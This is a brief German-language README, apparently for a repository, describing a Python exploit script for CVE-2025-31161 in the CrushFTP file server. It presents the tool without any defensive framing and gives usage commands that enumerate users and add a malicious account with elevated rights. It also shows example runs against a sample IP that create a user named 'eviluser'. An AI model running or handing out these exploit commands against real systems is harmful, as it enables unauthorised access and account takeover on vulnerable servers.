
Python-Exploit-Skript für CVE-2025-31161, das auf CrushFTP abzielt. Listet Benutzer auf und erstellt bösartige Konten mit erweiterten Berechtigungen über HTTP-Anfragen.
Dieses Repository enthält ein Python-Skript zur Interaktion mit dem CrushFTP-Dienst, der für CVE-2025-31161 anfällig ist. Das Skript ermöglicht es, vorhandene Benutzer aufzulisten und durch Ausnutzung der Schwachstelle einen bösartigen Benutzer hinzuzufügen.
requests-Modulpip install -r requirements.txt
python3 CVE-2025-31161.py listusers --ip <IP> --port <PORT>
python3 CVE-2025-31161.py adduser --ip <IP> --port <PORT> --valid_username <VALID_ADMIN> --username <NEW_USER> --password <PASSWORD>
python3 CVE-2025-31161.py listusers --ip 192.168.1.100 --port 80
python3 CVE-2025-31161.py adduser --ip 192.168.1.100 --port 8080 --username eviluser --password 1234